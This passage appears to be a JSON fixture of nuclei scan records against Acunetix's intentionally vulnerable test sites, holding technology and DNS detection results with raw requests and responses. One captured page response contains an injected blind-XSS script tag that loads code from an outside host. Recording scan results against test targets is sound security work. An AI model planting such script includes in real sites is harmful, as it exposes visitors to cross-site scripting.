href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 142, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "angular", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:46.966Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:37 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 143, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:47.040Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 23288\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 23288\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 144, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:47.138Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 55205\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 55205\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1799\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 145, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:47.220Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 48265\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 48265\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1799\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 146, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:47.305Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 49748\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 49748\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1799\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 147, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:47.398Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 18008\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 18008\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86399\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 148, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:47.476Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 9434\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 9434\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1799\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 149, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:47.574Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 791\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 791\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 150, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4845.178 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202", + "discovered_date": "2024-11-13T02:34:47.665Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:202 HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4845.178 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:42 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 151, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:47.733Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 56968\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 56968\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1798\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 152, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36' 'http://testphp.vulnweb.com/.idea/.name'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "discovered_date": "2024-11-13T02:34:47.820Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/.name HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:43 GMT\r\nEtag: "4f911cd6-6"\r\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\r\nServer: nginx/1.19.0\r\n\r\nacuart", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 153, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/607.1.40 (KHTML, like Gecko) Version/9.1.2 Safari/607.1.40' 'http://testphp.vulnweb.com/CVS/Entries'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "discovered_date": "2024-11-13T02:34:47.900Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET 